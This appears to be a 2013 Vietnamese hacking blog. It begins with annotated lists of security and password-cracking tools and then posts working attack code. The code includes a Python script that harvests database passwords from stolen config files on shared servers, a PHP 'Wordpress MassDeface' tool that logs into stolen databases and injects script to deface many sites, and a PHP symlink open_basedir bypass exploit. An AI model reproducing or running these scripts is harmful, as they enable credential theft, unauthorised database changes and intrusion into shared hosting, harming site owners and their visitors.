Friday 23 August 2013

Tool tổng hợp

Mình Vừa tổng hợp được rất nhiều địa chỉ các công cụ dành cho hacker các bạn tham khảo nha .

1. CÔNG CỤ ĐỐI PHÓ: 
+Black Ice by Network ice 
http://www.networkice.com 
+CyberCop Monitor by Network Associates 
http://www.nai.com 
+Hidden Object Locator 
http://www.netwarefiles.com/utils/hobjloc.zip 
+Ippl 
http://www.via.ecp.fr/~hugo/ippl/ 
+ITA from AXENT 
http://www.axent.com 
+Kane Security Monitor 
http://www.intrusion.com 
+Netguard 
http://www.Genocide2600.com/~tattoom...d-1.0.0.tar.gz 
+Network Flight Recorder Protolog 
http://www.nfr.net 
http://www.grigna.com/diego/linux/protolog/index.html 
+Psionic Portsentry from the Abacus project 
http://www.psionic.com/abacus/ 
+RealSecure by Internet Security System(ISS) 
http://www.iss.net 
+Scanlogd 
http://www.Genocide2600.com/~tattoom...logd-v1.3.c.gz 
+Secure by Memco 
http://www.memco.com 
+Secure Shell(SSH) 
http://www.ssh.fi 
http://www.datafellows.com 
+Abirnet/Platinum Technology 
http://www.abirnet.com 

Tổng hợp Tools hay nhất cho nghiên cứu Security

Tổng hợp Tools hay nhất cho nghiên cứu SecurityPDFPrintE-mail
Trong phần I của bài viết tôi đã giới thiệu với các bạn một phần trong số các tools cần thiết khi bạn muốn nghiên cứu về bảo mật. Phần II của bài viết tôi giới thiệu với các bạn phần còn lại những Tools được tổng hợp từ nhiều nguồn và theo kinh nghiệm.

Phần II
4. 10 Tools Scan các lỗ hổng trên Web hay nhất – Web Vulnerability Scanner.
5. 5 Tools để tấn công mạng Wireless hay nhất.
6. 3 Tools khai thác lỗ hổng bảo mật hay nhất.
7. 4 Tools dùng để thay đổi gói tin hay nhất – Packet Crafting
IV. 10 Tools Scan các lỗ hổng trên Web hay nhất – Web Vulnerability Scanner.
1. Nikto
Có nhiều tính năng hơn một công cụ Web Scanner.
Là một phần mềm mã nguồn mở với tính năng Web Server Scanner, tính năng kiểm tra các máy chủ Web. Bao gồm hơn 3200 phương thức nhận diện các file, lỗi logic nguy hiểm, hỗ trợ hơn 625 phiên bản Web Server, bao gồm những lỗi trên 230 Web Server khác nhau. Tính năng Scan kết hợp với các Plugins luôn được update tự động đảm bảo đưa ra kết quả đầy đủ và chính xác nhất. Là một công cụ rất hữu hiệu nhưng không được update thường xuyên. Các lỗi mới nhất thường được update chậm và không thể tìm thấy.
2. Paros Proxy
Một ứng dụng kiểm tra các lỗ hổng bảo mật trên cá ứng dụng web trên Proxy.
Một trang web trên nền Java thường kết hợp dạng proxy điều đó dẫn tới có nhiều lỗ hổng bảo mật. Phần mềm này hỗ trợ cho phép thay đổi/xem các gói tin HTTP/HTTPS và thay đổi chúng ở cookies. Bao gồm một tính năng Web Recorder, web spider, và công cụ Scanner cho phép kiểm tra các ứng dụng có khả năng bị tấn công như lỗi SQL Injection và Cross-site Scripting.
3. WebScarab.
Một khung hoạt động cho phép phân tích các ứng dụng giao tiếp sử dụng giao thức HTTP và HTTPS.
Một dạng rất đơn giản, WebScarab lưu các Request và Response cho phép tái sử dụng trong các phiên làm việc khác. WebScarab được thiết kế cho mọi người muốn xem hoạt động của các ứng dụng sử dụng giao thức HTTP(S), tuy nhiên công cụ này cũng cho phép phát triển và sửa những lỗi khó , hoặc cho phép nhận biết những lỗ hổng bảo mật trên các ứng dụng được thiết kế và triển khai.
4. WebInspect
Một công cụ tìm kiếm lỗ hổng trên ứng dụng Web rất hiệu quả.
SPI Dynamics’ WebInspect với những công cụ trợ giúp người dùng nhận dạng ra những lỗ hổng bảo mật trên ứng dụng Web. WebInspect có thể giúp kiểm tra các Web Server cấu hình đã chuẩn chưa, và cố gắng thử một vài dạng tấn công như Prameter Injection, Cross-site Scripting, Directory Traversal.
5. Whisker/libwhisker
Một công cụ với thư viện mở rất phong phú giúp tìm kiếm các lỗ hổng bảo mật trên ứng dụng Web.
Libwhisker một tính năng của ngôn ngữ Perl – Module cho phép kiểm tra ứng dụng HTTP. Cung cấp những tính năng giúp kiểm tra máy chủ HTTP bằng cách lấy những sự hiểu biết về bảo mật, những nguy cơ tấn công để kiểm tra các lỗ hổng bảo mật. Whisker là một công cụ tìm kiếm lỗ hổng bảo mật sử dụng Libwhisker nhưng giờ có công cụ khác hiệu quả hơn đó là Nikto cũng sử dụng Libwhisker.
6. Burpsuite
Kết hợp với ứng dụng để tấn công ứng dụng Web.
Burp cho phép một kẻ tấn công tích hợp nhiều thao tác bằng tay hay những phương pháp tự động để tấn công, phân tích và khai thác các lỗ hổng bảo mật trên ứng dụng Web.
7. Wikto
Một tool dùng để đánh giá mức độ bảo mật của máy chủ Web.
Là một tools dùng để kiểm tra các thiếu sót khi cấu hình máy chủ Web Server. Cho phép cung cấp nhiều module khác nhau (nếu tích hợp thêm sẽ phải tốn phí), ví dụ như Back-End Function hay Google Integration. Wikto được viết bằng công nghệ .NET của Microsoft, để download mã nguồn của phần mềm này bạn phải đăng ký trên Web site.
8. Acunetix Web Vulnerability Scanner.
Một phiên bản thương mại của chương trình tìm kiếm các lỗ hổng bảo mật trên các ứng dụng Web.
Acunetix WVS tự động kiểm tra các ứng dụng Web để tìm kiếm các lỗ hổng bảo mật như SQL Injection, hay Cross-Site Scripting, tìm kiếm những chính sách đối với mật khẩu đăng nhập cũng như các phương thức xác thực vào Web Site. Với giao diện đồ họa thân thiện, những Report đầy đủ cho phép bạn kiểm tra những vấn đề trên máy chủ và ứng dụng Web.
9. Watchfire AppScan
Một phiên bản thương mại của chương trình tìm kiếm các lỗ hổng bảo mật trên các ứng dụng Web.
AppScan cho phép kiểm tra những ứng dụng được phát triển trên nền web, dễ dàng kiểm tra và phát hiện lỗ hổng. AppScan kiểm tra nhiều lỗ hổng bảo mật, như Cross-Site Scripting, HTTP Response Spliting, và một vài dạng tấn công phổ biến khác, phát hiện các Trojan và Backdoor đang tồn tại trên máy chủ Web và nhiều hơn nữa.
10. N-Stealth
Công cụ Web Scanner.
Là một phiên bản thương mại, ứng dụng cho việc tìm kiếm các lỗ hổng bảo mật trên máy chủ Web. Phần mềm tự động update thường xuyên hơn các phần mềm miễn phí như Whisker/libwhisker hay Nikto, nhưng nhiều lỗi mới trên Web cũng không phát hiện kịp thời và nhanh chóng. Phần mềm bao gồm hơn 30.000 lỗ hổng có thể Scan và khai thác trực tiếp, cùng với hàng tá những cập nhật hàng ngày. Dễ dàng triển khai kết hợp với những Scan lỗ hổng bảo mật khác như: Nessus, ISS Internet Scanner, Retina, SAINT và Sara, bao gồm các tính năng khác. N-sealth là phiên bản chỉ dành riêng cho Windows và không thể download Source Code.

Tổng hợp Tools hay nhất cho việc nghiên cứu về Security

Tổng hợp Tools hay nhất cho nghiên cứu Security - IPDFPrintE-mail
Để hiểu được các vấn đề về an toàn thông tin bạn bắt buộc phải biết sử dụng những Tools chuyên cho từng vấn đề. Trong bài viết này tôi giới thiệu với các bạn tổng hợp những Tools hay nhất cho nghiên cứu bảo mật, được chọn lọc và tổng hợp từ nhiều nguồn, phân thành từng nhóm để các bạn thuận tiện cho tra cứu. Từ tổng hợp các Tools Scan, Crack, Sniffer.. hay nhất.

Phần I: Các tools hay nhất dùng để Crack Password, Sniffer và tìm kiếm các lỗ hổng bảo mật.

Phần II. Các tools hay nhất dùng để tìm kiếm lỗ hổng trên Web, tấn công mạng Wireless, khai thác lỗ hổng bảo mật và các tools để thay đổi thông tin của gói tin

Phần I

1. 10 Tools dùng để Crack Password hay nhất.
2. 11 Tools dùng để tóm gói tin hay nhất – Packet Sniffer.
3. 10 Tools Scan các lỗ hổng bảo mật hay nhất – Vulnerability Scanner.
I. 10 Công cụ dùng để Crack Password hay nhất.

1. Cain & Abel – Công cụ dùng để lấy Password trên Windows hiệu quả nhất.



Trên hệ thống UNIX thường dùng các tài nguyên miễn phí còn trên nền tảng Windows thì thường không phải như vậy. Trên nền tảng Windows có nhiều Tools cho phép Crack password nhưng rất ít tools cho phép tóm các gói tin trên mạng giải mã ngược lại để lấy được Password mong muốn. Cain & Abel là một tools vừa có thể Crack Password trên windows khi ngồi tại máy tính hay có thể tóm các gói tin trên mạng và giải mã ngược lại sử dụng: Dictionary và Bruforce Attack.
Ngoài ra Cain & Abel còn nằm trong số các phần mềm Sniffer.

2. John the Ripper



Là một công cụ có tính tùy biến rất cao, hỗ trợ cho nhiều nền tảng hệ điều hành và Crack Password rất nhanh. Hỗ trợ từ môi trường UNIX, Linux, DOS, Win32,…Và là một Tools rất hiệu quả để crack những Password dễ trên hệ thống UNIX. Tools này hỗ trợ nhiều phương thức mã hóa khác nhau thường tìm thấy trên hệ thống UNIX như Kerberos AFS và phương thức mã hóa trên Windows NT/2000/XP LM hashes.

3. THC Hydra



Một tools để crack những phương thức xác thực và hỗ trợ nhiều dịch vụ khác nhau
Nếu bạn muốn tấn công sử dụng phương thức Brute Force để tấn công tới một dịch vụ “Remote Authentication Service” thì Hydra là một lựa chọn tốt nhất. Nó có thể thực hiện tấn công dựa vào Dictionary Attack, thực hiện tấn công hơn 30 giao thức khác nhau bao gồm: Telnet, ftp, http, https, smb, và một vài giao thức của cơ sở dữ liệu khác.

4. Aircrack



Một công cụ tấn bẻ khóa WEP/WPA nhanh nhất.

Aircack hỗ trợ các chuẩn không giây 802.11a/b/g và dùng để Crack WEP và WPA. Nó có thể giải mã các mã hóa WEP sử dụng key có chiều dài từ 40 tới 512-bits và đủ cho giải mã hầu hết các gói tin trên mạng Wireless. Ngoài ra công cụ này còn hỗ trợ để bẻ khóa WPA1 và WPA2 bằng phương thức Brute Force Attack. Nó có thể hoạt động với: aircrack để crack các key mã hóa trên WEP và WPA-PSK, ngoài ra với airdecap chúng có khả năng giải mã các file được mã hóa bởi WEP và WPA.

5. L0phtcrack



Một tools kiểm tra các thiết lập password và crack password của Windows.

L0phtCrack, cũng hỗ trợ các phương thức mã hóa theo chuẩn LC5, khi thực hiện crack Password Windows được mã hóa khi ở trạng thái stand-alone hay đã join vào Domain, và là một công cụ để Crack password trên Active Directory. Nó cũng có khả năng sniffer trên mạng LAN. Nó có một vài phương thức để sinh ra các password để thử bằng phương thức (dictionary, brute force, etc). Ngoài tools này bạn có thể sử dụng những tools hiệu quả hơn như Cain & Abel, John the Ripper, hay Ophcack.

6. Airsnort



Một công cụ để Crack mã hóa WEP của mạng Wireless.

Airsnort là một công cụ có khả năng recovery key từ các gói tin truyền trên mạng WLAN. Được phát triển bởi Shmoo Group và được thực hiện thử độ khó và những nguy cơ tấn công vào mạng WLAN, ngoài tools này bạn có thể sử dụng tools Aircrack một công cụ hiệu quả hơn.

7. SolarWinds



Tool này cho phép scan mạng, giám sát và là một công cụ để tấn công.

SolarWinds được tạo ra với hàng tá các tác dụng. Với tính năng được giới thiệu như một công cụ để Scan và phát hiện các máy tính đang active trên mạng, là một công cụ tấn công hiệu quả giao thức SNMP bằng phương thức Brute-force attack, hay giải các mã hóa trên Router, là một công cụ hiệu quả nhất để cấu hình Router và các ứng dụng khác.

8. Pwdump.


Một công cụ recovery password trên Windows rất hiệu quả.
Pwdump cho phép extract file SAM trong Windows, hỗ trợ lấy các thông tin User, password đã được mã hóa. Ngoài tác dụng crack password mã hóa trong file SAM, nó còn có khả năng giải mã khi đặt syskey. Một lựa trọn tương tự bạn có thể sử dụng L0phtcrack cũng tương tự và hiệu quả hơn.

9. RainbowCrack.



Một tools dùng để crack password đã được mã hóa

Sử dụng có thể chiếm hết tài nguyên bộ nhớ để đánh đổi cho tính hiệu quả và giảm thiểu thời gian crack Password.

10. Brutus


Một công cụ dùng để tấn công các giao thức xác thực trên mạng.
Nó chỉ có khả năng tấn công chống lại các dịch vụ trên Windows bằng cách đoán mật khẩu đăng nhập từ các từ điển khác nhau. Chúng hỗ trợ rất nhiều giao thức nhuw: HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, và nhiều hơn nữa. Để tấn công các giao thức xác thực trên UNIX bạn có thể sử dụng THC Hydra.

Tuesday 21 May 2013

Crack Cpanels With Valide Passwords In Server [PYTHON]



Firstly you must creat folder in C: , for example : C:\a\
and filename.py is the name of script that you are saved onto you PC

so to use the script put this order in CMD :


Code:
filename.py [Configs URL] C:\a
And will get to you all password in configs

[Video] Crack Cpanels With Valide Passwords In Server [PYTHON] By ĦϻǼʑҟҁϼ :
http://devil-zone.net/vb/showthread.php?309-Video-Crack-Cpanels-With-Valide-Passwords-In-Server-PYTHON

http://devil-zone.net/vb/showthread.php?211-Crack-Cpanels-With-Valide-Passwords-In-Server-PYTHON&p=423&viewfull=1#post423



#!/usr/bin/env python

import sys
import os
import re
import subprocess
import urllib
import glob
from platform import system


def banner():
  print '''
`7MMF'   `7MF'OO `7MM"""Mq.`7MMF'   `7MF'.M"""bgd    `7MM"""Yb.   MMM"""AMV
  `MA     ,V  88   MM   `MM. MM       M ,MI    "Y      MM    `Yb. M'   AMV 
   VM:   ,V   ||   MM   ,M9  MM       M `MMb.          MM     `Mb '   AMV  
    MM.  M'   ||   MMmmdM9   MM       M   `YMMNq.      MM      MM    AMV   
    `MM A'    `'   MM  YM.   MM       M .     `MM      MM     ,MP   AMV   ,
     :MM;     ,,   MM   `Mb. YM.     ,M Mb     dM ,,   MM    ,dP'  AMV   ,M
      VF      db .JMML. .JMM. `bmmmmd"' P"Ybmmd"  db .JMMmmmdP'   AMVmmmmMM
      
                          WWW.DEVIL-ZONE.NET
  '''


if len(sys.argv) != 3:
  banner()
  print'''    
    Usage: %s [URL...] [directory...]
        
    Ex) %s http://www.test.com lnx1
  ''' % (sys.argv[0], sys.argv[0])
  sys.exit(1)


site = sys.argv[1]
fout = sys.argv[2]


try:
    req  = urllib.urlopen(site)
    read = req.read()
    if system() == 'Linux':
      f = open('/tmp/data.txt', 'w')
      f.write(read)
      f.close()
    if system() == 'Windows':
      f = open('data.txt', 'w')  
      f.write(read)
      f.close()


    i = 0
    if system() == 'Linux':
      banner()
      f = open('/tmp/data.txt', 'rU')
      for line in f:
        if line.startswith('<li><a') == True :
          m = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m.group(2)
          try:  urllib.urlretrieve(site + m.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<img') == True:
          m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m1.group(2)
          try:  urllib.urlretrieve(site + m1.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<IMG') == True:
          m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m2.group(2)
          try:  urllib.urlretrieve(site + m2.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
      f.close()
    if system() == 'Windows':
      banner()  
      f = open('data.txt', 'rU')
      for line in f:
        if line.startswith('<li><a') == True :
          m = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m.group(2)
          try:  urllib.urlretrieve(site + m.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<img') == True:
          m1 = re.search(r'(<a href=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m1.group(2)
          try:  urllib.urlretrieve(site + m1.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
        if line.startswith('<IMG') == True:
          m2 = re.search(r'(<A HREF=")(.+[^>])(">)', line)
          i += 1
          local_name = '%s/file%d.txt' % (fout, i)
          print 'Retrieving...\t\t', site + m2.group(2)
          try:  urllib.urlretrieve(site + m2.group(2), local_name)
          except IOError:
            print '\n[%s] doesn\'t exist, create it first' % fout
            sys.exit()
      f.close()
    if system() == 'Linux':
     cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()
    if system() == 'Windows':
      cleanup = subprocess.Popen('del C:\data.txt', shell=True).wait()
    print '\n', '-' * 100, '\n'
    if system() == 'Linux':
        for root, dirs, files in os.walk(fout):
          for fname in files:
            fullpath = os.path.join(root, fname)
            f = open(fullpath, 'r')
            for line in f:
              secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
              if secr is not None: print (secr.group(2))  
              secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
              if secr1 is not None:  print  (secr1.group(2))
              secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
              if secr2 is not None: print (secr2.group(3))
              secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
              if secr3 is not None: print (secr3.group(2))
              secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
              if secr4 is not None: print (secr4.group(2))
              secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
              if secr5 is not None: print (secr5.group(2))
              secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
              if secr6 is not None: print (secr6.group(2))
              secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
              if secr7 is not None: print (secr7.group(2))
            f.close()
    if system() == 'Windows':
        for infile in glob.glob( os.path.join(fout, '*.txt') ):
            f = open(infile, 'r')
            for line in f:
              secr = re.search (r"(db_password'] = ')(.+[^>])(';)", line)
              if secr is not None: print (secr.group(2))  
              secr1 = re.search(r"(password = ')(.+[^>])(';)", line)
              if secr1 is not None:  print  (secr1.group(2))
              secr2 = re.search(r"(DB_PASSWORD')(...)(.+[^>])(')", line)
              if secr2 is not None: print (secr2.group(3))
              secr3 = re.search (r"(dbpass =..)(.+[^>])(.;)", line)
              if secr3 is not None: print (secr3.group(2))
              secr4 = re.search (r"(DBPASSWORD = ')(.+[^>])(.;)", line)
              if secr4 is not None: print (secr4.group(2))
              secr5 = re.search (r"(DBpass = ')(.+[^>])(';)", line)
              if secr5 is not None: print (secr5.group(2))
              secr6 = re.search (r"(dbpasswd = ')(.+[^>])(';)", line)
              if secr6 is not None: print (secr6.group(2))
              secr7 = re.search (r"(mosConfig_password = ')(.+[^>])(';)", line)
              if secr7 is not None: print (secr7.group(2))
            f.close()
            
    print '\nCreated by: V!RUS.DZ \n >> PWNRS'
except (KeyboardInterrupt):
    print '\nThanks for using it ._^'
    print '>> http://www.devil-zone.net\n'



























































































































































Wordpress MassDeface


<title>Wordpress MassDeface</title>
        <style>
        body
        {
                background: #0f0e0d;
                color: #FF9933;
                padding: 0px;
        }
        a:link, body_alink
        {
                color: #FF9933;
                text-decoration: none;
        }
        a:visited, body_avisited
        {
                color: #FF9933;
                text-decoration: none;
        }
        a:hover, a:active, body_ahover
        {
                color: #FFFFFF;
                text-decoration: none;
        }
        td, th, p, li,table
        {
               
                background: #2e2b28;
                border:1px solid #524f46;
        }
        input
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }textarea
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }
        button
        {
                border: 1px solid;
                cursor: default;
               
                overflow: hidden;
                background: #2e2b28;
                color: #ffffff;
        }
        </style>
        </head>
         
        <body bgcolor="black">
        <center>
        <pre>
        __          __      __  __                 _____        __              
                 / /     |  /  |               |  __       / _|              
            /  / / __   |   / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
           /  / / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
           \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
            \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
                   | |                                                          
                   |_|                                                          
        </pre>
        </center>
        <form method="POST" action="" >
        <center>
        <table border='1'><tr><td>List of All Symlink</td><td>
        <input type="text" name="url" size="100" value="list.txt"></td></tr>
        <tr><td>Index</td><td>
        <textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
        <br><br><input type="Submit" name="Submit" value="Submit">
        <input type="hidden" name="action" value="1"></form>
        </center>
        <?
        set_time_limit(0);
        if ($_POST['action']=='1'){
        $url=$_POST['url'];
        $users=@file($url);
         
         
        if (count($users)<1) exit("<h1>No config found</h1>");
        foreach ($users as $user) {
        $user1=trim($user);
        $code=file_get_contents2($user1);
        preg_match_all('|define.*(.*'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
        $db=$b1[1][0];
        preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
        $user=$b2[1][0];
        preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
        $db_password=$b3[1][0];
        preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
        $host=$b4[1][0];
        preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
        $p=$b5[1][0];
         
         
        $d=@mysql_connect( $host, $user, $db_password ) ;
        if ($d){
        @mysql_select_db($db );
        $source=stripslashes($_POST['index']);
        $s2=strToHex(($source));
        $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
        $ls=strlen($s)-2;
        $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
        mysql_query($sql) ;
        $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
        mysql_query($sql) ;
        if (function_exists("mb_convert_encoding") )
        {
        $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
        $source2=mysql_real_escape_string($source2);
        $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
        @mysql_query($sql) ; ;
        $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
        @mysql_query($sql) ; ;
        }
        $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
        $siteurl=@mysql_fetch_array($aa) ;
        $siteurl=$siteurl['option_value'];
        $tr.="$siteurl\n";
        mysql_close();
        }
        }
        if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
        }
        function strToHex($string)
        {
            $hex='';
            for ($i=0; $i < strlen($string); $i++)
            {
                if (strlen(dechex(ord($string[$i])))==1){
                $hex .="%0". dechex(ord($string[$i]));
                        }
                        else
                        {
                        $hex .="%". dechex(ord($string[$i]));
                        }
            }
            return $hex;
        }
         
        function file_get_contents2($u){
         
                $ch = curl_init();
            curl_setopt($ch,CURLOPT_URL,$u);
                curl_setopt($ch, CURLOPT_HEADER, 0);    
           curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
            curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
                    $result = curl_exec($ch);
                return $result ;
                }
               
        ?>







http://devil-zone.net/vb/showthread.php?2072-Archive-of-all-tools-for-Bypass-Symlink&p=9398&viewfull=1#post9398


All tools for Bypass Symlink

PHP 5.2.12/5.3.1 symlink() open_basedir bypass

<?php
/*
PHP 5.2.12/5.3.1 symlink() open_basedir bypass 
by Maksymilian Arciemowicz http://securityreason.com/
cxib [ a.T] securityreason [ d0t] com

CHUJWAMWMUZG
*/

$fakedir="cx";
$fakedep=16;

$num=0; // offset of symlink.$num

if(!empty($_GET['file'])) $file=$_GET['file'];
else if(!empty($_POST['file'])) $file=$_POST['file'];
else $file="";

echo '<PRE><img src="http://securityreason.com/gfx/logo.gif?cx5211.php"><P>This is exploit from <a
href="http://securityreason.com/" title="Security Audit PHP">Security Audit Lab - SecurityReason</a> labs.
Author : Maksymilian Arciemowicz
<p>Script for legal use only.
<p>PHP 5.2.12 5.3.1 symlink open_basedir bypass
<p>More: <a href="http://securityreason.com/">SecurityReason</a>
<p><form name="form"
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF"]).'" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hym" value="Create Symlink"></form>';

if(empty($file))
    exit;

if(!is_writable("."))
    die("not writable directory");

$level=0;

for($as=0;$as<$fakedep;$as++){
    if(!file_exists($fakedir))
        mkdir($fakedir);
    chdir($fakedir);
}

while(1<$as--) chdir("..");

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
    if(!empty($hardstyle[$a])){
        if(!file_exists($hardstyle[$a])) 
            mkdir($hardstyle[$a]);
        chdir($hardstyle[$a]);
        $as++;
    }
}
$as++;
while($as--)
    chdir("..");

@rmdir("fakesymlink");
@unlink("fakesymlink");

@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");

// this loop will skip allready created symlinks.
while(1)
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
    else $num++;

@unlink("fakesymlink");
mkdir("fakesymlink");

die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');

?>